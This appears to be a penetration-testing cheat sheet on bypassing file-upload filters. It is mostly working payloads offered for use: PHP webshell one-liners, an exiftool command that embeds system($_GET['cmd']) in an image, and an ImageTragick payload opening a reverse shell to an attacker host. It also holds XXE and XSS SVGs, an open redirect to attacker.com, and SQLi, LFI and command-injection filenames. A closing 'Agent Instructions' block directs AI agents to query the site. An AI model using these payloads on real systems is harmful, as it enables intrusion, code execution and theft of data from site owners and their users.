# File upload ``` Tools Burp > Upload Scanner ``` 
# Methodologie
- Blacklisted Extension Bypass
- Content-Type Bypass
- Magic Byte Bypass
- Filename vulnerabilities

# File name validation
    # extension blacklisted:
    PHP: .phtm, phtml, .phps, .pht, .php2, .php3, .php4, .php5, .shtml, .phar, .pgif, .inc
    ASP: .asp, .aspx, .cer, .asa
    Jsp: .jsp, .jspx, .jsw, .jsv, .jspf
    Coldfusion: .cfm, .cfml, .cfc, .dbm
    Using random capitalization: .pHp, .pHP5, .PhAr
    pht,phpt,phtml,php3,php4,php5,php6,php7,phar,pgif,phtm,phps,shtml,phar,pgif,inc
    # extension whitelisted:
    file.jpg.php
    file.php.jpg
    file.php.blah123jpg
    file.php%00.jpg
    file.php\x00.jpg
    file.php%00
    file.php%20
    file.php%0d%0a.jpg
    file.php.....
    file.php/
    file.php.\
    file.
    .html
# SecLists/Discovery/Web-Content/web-extensions.txt

# Content type bypass
    - Preserve name, but change content-type
    Content-Type: image/jpeg, image/gif, image/png
# SecLists/Miscellaneous/web/content-type.txt

# Content length:
    # Small bad code:
    <?='$_GET[x]'?>

# Magic Header Bytes
PNG: \x89PNG\r\n\x1a\n\0\0\0\rIHDR\0\0\x03H\0\xs0\x03[
JPG: \xff\xd8\xff
GIF: GIF87a OR GIF8;
#en.wikipedia.org/wiki/List_of_file_signatures

# Payload Obfuscation
PHP webshell : <?=`$_GET[cmd]`?>

#Filename vulnerabilities
SQLi:	poc.js'(select*from(select(sleep(20)))a)+'.extension
LFI: 	image.png../../../../../../../../../etc/passwd
XSS:	'"><img src=x onerror=alert(document.domain)>.extension
File Traversal:		../../../logo.png
Command Injection:	; sleep 10;

#Bypass getimagesize():
exiftool -Comment='"; system($_GET['cmd']); ?>' file.jpg

# Impact by extension
asp, aspx, php5, php, php3: webshell, rce
svg: stored xss, ssrf, xxe
gif: stored xss, ssrf
csv: csv injection
xml: xxe
avi: lfi, ssrf
html, js: html injection, xss, open redirect
png, jpeg: pixel flood attack dos
zip: rce via lfi, dos
pdf, pptx: ssrf, blind xxe

# ImageTragick
push graphic-context
viewbox 0 0 640 480
fill 'url(https://127.0.0.1/test.jpg"|bash -i >& /dev/tcp/attacker-ip/attacker-port 0>&1|touch "hello)'
pop graphic-context

# XXE .svg
<?xml version="1.0" standalone="yes"?>
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]>
<svg width="500px" height="500px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1
<text font-size="40" x="0" y="16">&xxe;</text>
</svg>

<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="300" version="1.1" height="200">
<image xlink:href="expect://ls"></image>
</svg>

# XSS svg
<svg onload=alert(document.comain)>.svg
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
File Upload Checklist 3
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
<script type="text/javascript">
alert("HolyBugx XSS");
</script>
</svg>

# Open redirect svg
<code>
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<svg
onload="window.location='https://attacker.com'"
xmlns="http://www.w3.org/2000/svg">
<rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
</svg>
</code>
    
# Filter Bypassing Techniques
# upload asp file using .cer & .asa extension (IIS — Windows)
# Upload .eml file when content-type = text/HTML
# Inject null byte shell.php%001.jpg
# Check for .svg file upload you can achieve stored XSS using XML payload
# put file name ../../logo.png or ../../etc/passwd/logo.png to get directory traversal via upload file
# Upload large size file for DoS attack test using the image.
# (magic number) upload shell.php change content-type to image/gif and start content with GIF89a; will do the job!
# If web app allows for zip upload then rename the file to pwd.jpg bcoz developer handle it via command
# upload the file using SQL command 'sleep(10).jpg you may achieve SQL if image directly saves to DB.

# Advance Bypassing techniques
# Imagetragick aka ImageMagick:
https://mukarramkhalid.com/imagemagick-imagetragick-exploit/
https://github.com/neex/gifoeb
    
# Upload file tool
https://github.com/almandin/fuxploider
python3 fuxploider.py --url https://example.com --not-regex "wrong file type"

https://github.com/sAjibuu/upload_bypass
```bash for char in '%20' '%0a' '%00' '%0d0a' '/' '.\\' '.' '…' ':'; do for ext in '.php' '.phps'; do echo "shell$char$ext.jpg" >> wordlist.txt echo "shell$ext$char.jpg" >> wordlist.txt echo "shell.jpg$char$ext" >> wordlist.txt echo "shell.jpg$ext$char" >> wordlist.txt done done ``` ### Cheatsheet ``` upload.random123 --- To test if random file extensions can be uploaded. upload.php --- try to upload a simple php file. upload.php.jpeg --- To bypass the blacklist. upload.jpg.php --- To bypass the blacklist. upload.php --- and Then Change the content type of the file to image or jpeg. upload.php* --- version - 1 2 3 4 5 6 7. upload.PHP --- To bypass The BlackList. upload.PhP --- To bypass The BlackList. upload.pHp --- To bypass The BlackList. upload .htaccess --- By uploading this [jpg,png] files can be executed as php with milicious code within it. pixelFlood.jpg --- To test againt the DOS. frameflood.gif --- upload gif file with 10^10 Frames Malicious zTXT --- upload UBER.jpg Upload zip file --- test againts Zip slip (only when file upload supports zip file) Check Overwrite Issue --- Upload file.txt and file.txt with different content and check if 2nd file.txt overwrites 1st file SVG to XSS --- Check if you can upload SVG files and can turn them to cause XSS on the target app SQLi Via File upload --- Try uploading `sleep(10)-- -.jpg` as file ``` ![](https://3869391553-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FDMM6SCLTDlo5fkDXCdeU%2Fuploads%2Fgit-blob-d66270e323df1a4c99b08567aaca326ea840a4c9%2Fimage%20\(46\).png?alt=media) --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://cyb3r.gitbook.io/pentestbook/enumeration/web/upload-bypasses.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.